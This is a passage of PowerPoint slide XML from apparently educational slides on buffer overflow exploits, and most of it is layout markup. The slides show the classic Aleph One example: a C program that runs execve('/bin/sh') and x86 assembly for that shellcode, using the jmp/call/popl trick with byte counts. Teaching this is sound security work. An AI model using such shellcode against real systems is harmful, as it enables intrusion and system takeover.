            <a:ext cx="1257300" cy="6286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machine code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557837" y="3514725"/>
            <a:ext cx="514350" cy="6286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ptr</a:t>
            </a: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0161C-358E-7A4B-A4AE-D04A6BEC6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an Exploit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51B0C1-AECB-234F-A264-F2BCA7797753}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3400424" y="4554835"/>
            <a:ext cx="1914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executable machine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33D533-6CB5-E54F-96D4-C783A1A17659}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5815012" y="4532396"/>
            <a:ext cx="122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pointer to this code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2ADA554-10DF-A44D-8A15-5A093B7D35D0}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4147155" y="4067550"/>
              <a:ext cx="433800" cy="479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2ADA554-10DF-A44D-8A15-5A093B7D35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1155" y="4031550"/>
                <a:ext cx="505440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F4A59E0-35E0-C642-8C2F-010B4D38C6D0}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5842395" y="4062150"/>
              <a:ext cx="314640" cy="45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F4A59E0-35E0-C642-8C2F-010B4D38C6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06395" y="4026510"/>
                <a:ext cx="386280" cy="52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4E0EF060-3966-D849-8C99-037163354F3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4597875" y="2868390"/>
            <a:ext cx="1349640" cy="767520"/>
            <a:chOff x="3912075" y="2154015"/>
            <a:chExt cx="1349640" cy="76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8F5EA91-0013-F645-89C1-0181E5084223}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3912075" y="2154015"/>
                <a:ext cx="1349640" cy="767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8F5EA91-0013-F645-89C1-0181E508422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03075" y="2145375"/>
                  <a:ext cx="136728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92E9992-EEEC-FC44-991E-E079802D4E94}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3987675" y="2552175"/>
                <a:ext cx="215640" cy="120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92E9992-EEEC-FC44-991E-E079802D4E9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79035" y="2543175"/>
                  <a:ext cx="233280" cy="13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3091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Shell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6812" y="2114552"/>
            <a:ext cx="3826788" cy="240065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500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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void main() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   char *name[2];</a:t>
            </a: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   name[0] = "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   name[1] = NULL;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(name[0], name, NULL);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   exit(0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2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2564" y="4615567"/>
            <a:ext cx="23810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Shell code from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>AlephOne</a:t>
            </a:r>
            <a:endParaRPr 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6019800" y="2114550"/>
            <a:ext cx="4419600" cy="3046988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nl-NL" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>addr,string_addr_addr</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1600" dirty="0">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  $0x0,null_byte_addr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  $0x0,null_addr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  $0xb,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  string_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1600" dirty="0">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>leal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  string_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1600" dirty="0">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>leal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  null_string,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1600" dirty="0">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>int   $0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  $0x1, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1600" dirty="0">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  $0x0, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1600" dirty="0">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>int   $0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>/bin/sh string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>goes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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11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665243" y="3739761"/>
            <a:ext cx="628650" cy="6286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more code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574337" y="3739761"/>
            <a:ext cx="481012" cy="6286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ptr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360487" y="2014194"/>
            <a:ext cx="542925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400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    offset-to-call           # 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>bytes</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1400" dirty="0">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>popl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>                     # 1 byte</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esi,array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>-offset(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)  # 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>bytes</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1400" dirty="0">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   $0x0,nullbyteoffset(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>) # 4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>bytes</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1400" dirty="0">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   $0x0,null-offset(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)   # 7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>bytes</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1400" dirty="0">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   $0xb,%eax                # 5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>bytes</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1400" dirty="0">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>                # 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>bytes</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1400" dirty="0">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>leal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>-offset,(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> # 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>bytes</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1400" dirty="0">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>leal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>-offset(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   # 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>bytes</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1400" dirty="0">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    $0x80                    # 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>bytes</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1400" dirty="0">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   $0x1, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>		      # 5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>bytes</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1400" dirty="0">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   $0x0, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>		      # 5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>bytes</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1400" dirty="0">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    $0x80		      # 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
